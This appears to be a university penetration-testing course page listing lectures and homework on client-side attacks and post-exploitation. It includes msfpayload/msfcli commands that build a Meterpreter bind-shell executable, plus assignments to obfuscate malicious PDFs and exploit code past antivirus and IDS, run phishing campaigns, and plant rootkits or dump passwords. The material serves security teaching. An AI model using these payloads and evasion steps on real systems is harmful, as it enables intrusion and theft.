Client-sides

In penetration testing, the targets for exploitation aren't always network services that are exposed through a firewall. When you need to find other ways in, your primary targets become the browser, office applications, audio and video players, and the user himself. Dean De Beer and Colin Ames are going to explain this attack methodology and how it's different from what you've learned so far.

Homework

You have three choices for your homework assignment in this section:

Option 1: Plugin Detection

  • Create a webpage that detects browser version, 3rd party apps, class IDs, etc
  • Consider cross-browser functionality
  • Deliver or exploit or a unique page based on collected information

Option 2: Create and obfuscate MDAC RDS code

  • Try to bypass a network IDS, consider what the signatures are triggering on
  • Code sample available (check presentation, milw0rm, or ask Dean)

Option 3: Malicious PDF

  • Encode/obfuscate a malicious PDF to bypass AV on a host. Test the PDF against VirusTotal. The malicious PDF must remain functionality (open calc.exe)
  • Code sample available (ask Dean)
CommentPost a Comment |

Post-Exploitation

This is a really rough cut of Colin's Post-exploitation lecture. There is something wrong with the audio and friends are helping me work this out so that it's in an listenable state. I'm planning on taking another shot at it after Thanksgiving.

[homework coming soon]

CommentPost a Comment |

Reference Material

Like the reversing section, there is simply too much reference material I wanted to include so I've centralized it here for you.

Reading Material

Web Malware

Finding samples

Reversing it

Meterpreter Documentation

If the meterpreter API doesn't natively do what you want it to, try uploading and executing one of Nirsoft's utilities.

You don't have to exploit anything to get a Meterpreter instance running. You can bundle Meterpreter into an executable to double-click and run with the following msfpayload commands:

create payload:

  • ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > meterpreter.exe

to listen for connections:

  • ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=4444 E
CommentPost a Comment |

Post-Exploitation 2008

Hopefully it should be clear from the Client-side section that you can get more shells than you know what to do with in a well-designed phishing campaign. This brings up some interesting problems in that you can't sit around and interact with each shell anymore, you need to automate what you want to extract or abuse from each host. Dean De Beer is back to talk about this problem in today's lecture.

Homework

Your homework is to write a meterpreter script that automates some post-exploitation activity you think you would need to perform. Choose one of my ideas below or come up with your own!

  • Configure and upload the FU or FUTO rootkit
  • Pull out passwords from .vbs scripts on the PATH
  • Set the victim's wallpaper and sound
  • A VNC password decoder
  • A WEP password dumper
  • Whatever else you want...
CommentPost a Comment |

Client-sides 2008

Homework

You have two choices for your homework assignment in this section:

Option 1: Run a Phishing Campaign

  • 1a. Intelligence Gathering
    • Find all e-mail addresses for poly.edu
    • Find any other domains, URLs, or other info that can be used to improve a phish's success
    • Describe methods, tools and scripts used for this step
  • 1b. Target phishfood@###.com
    • Develop an e-mail (create a scenario) and link it to malicious site that you create
    • At your landing page, gather the following info: remote IP, plugins, browser, etc...
    • If possible, drop and execute a file on the target

Option 2: Analyze a web-based malware

  • Decode the JS and describe its obfuscation techniques
  • Describe what it does, what bug it exploits, how, etc...
  • Modify the code [payload] to use your own payload.exe
CommentPost a Comment |